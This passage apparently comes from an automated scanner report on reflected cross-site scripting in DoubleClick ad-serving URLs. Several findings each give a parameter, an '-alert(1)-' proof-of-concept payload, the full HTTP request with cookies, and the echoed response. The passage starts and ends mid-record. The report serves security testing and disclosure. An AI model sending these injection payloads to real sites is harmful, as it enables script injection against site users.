document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...
5.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4ac"-alert(1)-"007c6132307 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:32 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:32 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fs
...[SNIP]...
5.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95c6a'-alert(1)-'c3ace347376 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:37 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:37 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...
5.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c9ed'-alert(1)-'60d03a3f198 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:38:45 GMT
Expires: Sat, 26 Mar 2011 01:38:45 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...
5.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ef8"-alert(1)-"92ebfe0424f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:38:41 GMT
Expires: Sat, 26 Mar 2011 01:38:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424fhttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fscUrl = url
...[SNIP]...
5.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bec3'-alert(1)-'b3534d6f54d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:11 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:11 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...
5.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7ede"-alert(1)-"78d948007db was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:07 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:07 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...
5.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26d19'-alert(1)-'06d1516c0ac was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=7026d19'-alert(1)-'06d1516c0ac&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:49 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:49 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=7026d19'-alert(1)-'06d1516c0ac&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnb
...[SNIP]...
5.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

